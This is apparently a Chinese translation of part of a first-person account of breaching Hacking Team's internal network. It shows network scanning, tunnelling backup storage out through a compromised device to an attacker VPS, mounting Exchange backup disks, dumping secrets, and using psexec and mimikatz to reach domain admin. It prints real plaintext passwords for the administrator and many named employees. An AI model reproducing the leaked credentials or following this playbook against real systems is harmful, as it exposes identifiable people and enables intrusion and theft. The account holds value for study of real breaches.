7 – 看和听

现在进入到他们的内网,我需要先观察一下然后思考下一步动作,我启动了Responder.py,并打开了分析模式(-A指定监听并且不会发送响应),并且用nmap做缓慢的扫描。

8 – NoSQL数据库

对于黑客社区来说,NoSQL或者NoAuthentication是一个巨大的礼物[1]。正当我担心他们会将MySQL验证模块的Bug打补丁时[2][3][4][5],新的数据库到来了,并且在设计上缺乏了验证机制。Nmap在黑客团队的内网中发现了一些:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072

|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases

|_    version = 2.6.5

它们正是RCS测试用例的数据库。RCS记录的音频数据保存在MongoDB中,而torrent[6]中的音频文档正是来源于此。他们不经意间正在监视着自己。

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/

9 – 跨网络

虽然听到他们的录音以及看到他们编写恶意软件的样子很有趣,但是并没有太大帮助。他们不安全的备份就相当于敞开了大门。根据他们的文档[1],他们支持各个网络中使用iSCSI设备,nmap在子网192.168.1.200/24中找到了一些:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)

3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

iSCSI需要一个内核模块,对于嵌入式系统来说编译它并不困难。通过转发端口我可以在VPS中将其挂载上去:
VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

现在iSCSI可以发现iqn.2000-01.com.synology,但是仍然不能将其挂载上去因为它的IP是192.168.200.72而不是127.0.0.1。
我解决的方式为:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT –to-destination 127.0.0.1

然后再通过:
iscsiadm -m node –targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 –login

就能看到设备文件了!通过命令vmfs-fuse -o ro /dev/sdb1 /mnt/tmp将它挂载上去。

我们会发现有不同的虚拟机的备份。而交换服务器是看起来最有趣的。因为它太大了,所以不好下载,但是可以从远端挂载以查看文件:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

现在在/mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311,我们就能发现虚拟机的磁盘,挂载上去:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
最终我们解开了这个俄罗斯套娃,可以在/mnt/part1中查看到所有的文件。

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

10 – 从备份到域管理员

在备份中最让我感兴趣的就是看是否保存了密码或哈希可以让我访问到存活的主机。我使用了pwdump,cachedump以及lsadump[1],最终lasdump发现了服务器账号的密码:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    …………….
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!………..

然后我使用proxychains[2]连接嵌入设备上的socks server并且用smbclient[3]去检查密码:
proxychains smbclient “//192.168.100.51/c$” -U “hackingteam.local/besadmin%bes32678!!!”

试验成功了!besadmin的密码仍然是可用的,是一个本地的管理员。我使用代理和metasploit的psexec_psh[4]工具获取到了一个会话,然后转移到一个64位的进程中,运行“load kiwi[5]”,”creds_wdigets”获取到了非常多的密码,包括域管理员的:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword      <—- lol great sysadmin
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e$$andra
HACKINGTEAM  m.bettini      Ettore&Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&2E
HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz